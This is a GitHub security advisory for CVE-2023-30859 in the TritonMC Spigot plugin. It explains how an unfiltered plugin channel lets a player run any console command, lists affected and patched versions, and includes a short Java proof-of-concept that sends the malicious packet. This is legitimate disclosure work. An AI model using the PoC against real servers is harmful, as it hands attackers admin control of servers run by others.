Skip to content

Arbitrary command execution on Spigot console by malicious player

High
diogotcorreia published GHSA-8vj5-jccf-q25r Apr 30, 2023

Package

TritonMC (Spigot Plugin)

Affected versions

>= 3.8.0, <= 3.8.3
<= 3.7.4

Patched versions

3.8.4
3.7.5

Description

Summary

A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.

Details

When you enable bungeecord mode in the config, the plugin will enable the proxy bridge, and the server will begin to broadcast the triton:main plugin channel.
This channel is used by Triton for communication between the proxy and the server (and vice-versa), and allows to, among other actions, to tell the server to execute any command as the console.

Triton did not filter incoming plugin messaging packets from Players, so a modded client could send a package that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for Privilege Escalation in the Minecraft server, and perhaps even an RCE in the machine itself.

Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server's translations, for instance, but those are less powerful than the above payload.

Proof of Concept

Demonstration video:
POC Video

Demonstration code:

// This is for version 1.8, for later versions the code will change slightly
private void triton(String command) {
	try {
		ByteArrayOutputStream b = new ByteArrayOutputStream();
		DataOutputStream out = new DataOutputStream(b);
		out.writeByte(2); // Sub Channel ID
		out.writeUTF(command); // Command
		PacketBuffer buffer = (new PacketBuffer(Unpooled.buffer()));
		buffer.writeBytes(b.toByteArray());
		mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer));
	} catch(Exception e) {
        e.printStackTrace();
    }
}

This is also a similar exploit to these:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit

Impact

This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true on Triton's config.yml, no matter if they are behind BungeeCord or Velocity or not.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

CVE ID

CVE-2023-30859

Weaknesses

Credits